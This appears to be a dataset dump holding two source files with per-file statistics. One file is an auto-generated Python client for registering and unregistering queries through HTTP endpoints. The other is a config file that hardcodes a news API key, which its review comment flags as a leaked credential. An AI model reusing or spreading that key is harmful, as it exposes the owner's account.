
    def register_queries(self, query_definition_request, **kwargs):  # noqa: E501
        """Register query definitions  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.register_queries(query_definition_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param QueryDefinitionRequest query_definition_request: (required)
        :return: QueryFQNList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(
            self.register_queries_with_http_info,
            query_definition_request, **kwargs)

    def register_queries_with_http_info(self, query_definition_request, **kwargs):  # noqa: E501
        """Register query definitions  # noqa: E501

        Same contract as :meth:`register_queries`, but returns the full
        HTTP response info unless ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('register_queries', local_var_params,
                           all_params=['query_definition_request'],
                           required=['query_definition_request'])
        return self._call_endpoint(
            '/queries.register', 'POST', local_var_params,
            response_type='QueryFQNList',
            body_param_name='query_definition_request',
            content_type='application/json')

    def register_queries_from_model_compartment(self, model_compartment, **kwargs):  # noqa: E501
        """Registers query definitions contained in model compartments.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.register_queries_from_model_compartment(model_compartment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ModelCompartment model_compartment: Model compartment descriptor. (required)
        :return: QueryListResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(
            self.register_queries_from_model_compartment_with_http_info,
            model_compartment, **kwargs)

    def register_queries_from_model_compartment_with_http_info(self, model_compartment, **kwargs):  # noqa: E501
        """Registers query definitions contained in model compartments.  # noqa: E501

        Same contract as :meth:`register_queries_from_model_compartment`,
        but returns the full HTTP response info unless
        ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('register_queries_from_model_compartment',
                           local_var_params,
                           all_params=['model_compartment'],
                           required=['model_compartment'])
        return self._call_endpoint(
            '/queries.registerFromModelCompartment', 'POST', local_var_params,
            response_type='QueryListResponse',
            body_param_name='model_compartment',
            content_type='application/json')

    def register_queries_plain_text(self, body, **kwargs):  # noqa: E501
        """Register query definitions in plain text format  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.register_queries_plain_text(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str body: Query definition in plain text (required)
        :param str query_package: Optional query package for organizing queries and controlling visibility. The value must be a legal Java package name: * start with lowercase letter * contain only lowercase letters, digits and dots ('.') * cannot end with dot ('.')
        :param str query_language: Optional parameter for defining the query language. Default value is 'viatra'. Choose one of the followings: viatra, lucene
        :return: QueryFQNList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(
            self.register_queries_plain_text_with_http_info, body, **kwargs)

    def register_queries_plain_text_with_http_info(self, body, **kwargs):  # noqa: E501
        """Register query definitions in plain text format  # noqa: E501

        Same contract as :meth:`register_queries_plain_text`, but returns
        the full HTTP response info unless ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('register_queries_plain_text', local_var_params,
                           all_params=['body', 'query_package',
                                       'query_language'],
                           required=['body'])
        return self._call_endpoint(
            '/queries.registerPlainText', 'POST', local_var_params,
            response_type='QueryFQNList',
            query_param_map=[('queryPackage', 'query_package'),
                             ('queryLanguage', 'query_language')],
            body_param_name='body',
            content_type='text/plain')

    def unregister_all_queries(self, **kwargs):  # noqa: E501
        """Unregister all queries  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.unregister_all_queries(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: SimpleMessage
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(
            self.unregister_all_queries_with_http_info, **kwargs)

    def unregister_all_queries_with_http_info(self, **kwargs):  # noqa: E501
        """Unregister all queries  # noqa: E501

        Same contract as :meth:`unregister_all_queries`, but returns the
        full HTTP response info unless ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('unregister_all_queries', local_var_params,
                           all_params=[], required=[])
        return self._call_endpoint(
            '/queries.unregisterAll', 'POST', local_var_params,
            response_type='SimpleMessage')
| 40.752492
| 268
| 0.635674
| 2,807
| 24,533
| 5.253652
| 0.074457
| 0.043399
| 0.064556
| 0.029294
| 0.923645
| 0.910626
| 0.900183
| 0.892046
| 0.871025
| 0.85041
| 0
| 0.014179
| 0.281295
| 24,533
| 601
| 269
| 40.8203
| 0.822198
| 0.332654
| 0
| 0.744548
| 1
| 0
| 0.17712
| 0.05332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040498
| false
| 0
| 0.012461
| 0
| 0.11215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f5cae9b8c5dde7b9d0cb90e744f13dc4e8a3f7d
| 49
|
py
|
Python
|
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
# SECURITY NOTE(review): this is a live-looking API credential committed in
# plain text. It should be loaded from the environment instead (e.g.
# os.environ.get('NEWS_API_KEY')) and this key should be rotated, since it
# is now part of the repository history.
NEWS_API_KEY = '827e6ae4f3574bf2b3726cac9e755d63'
| 49
| 49
| 0.897959
| 4
| 49
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.425532
| 0.040816
| 49
| 1
| 49
| 49
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0.64
| 0.64
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.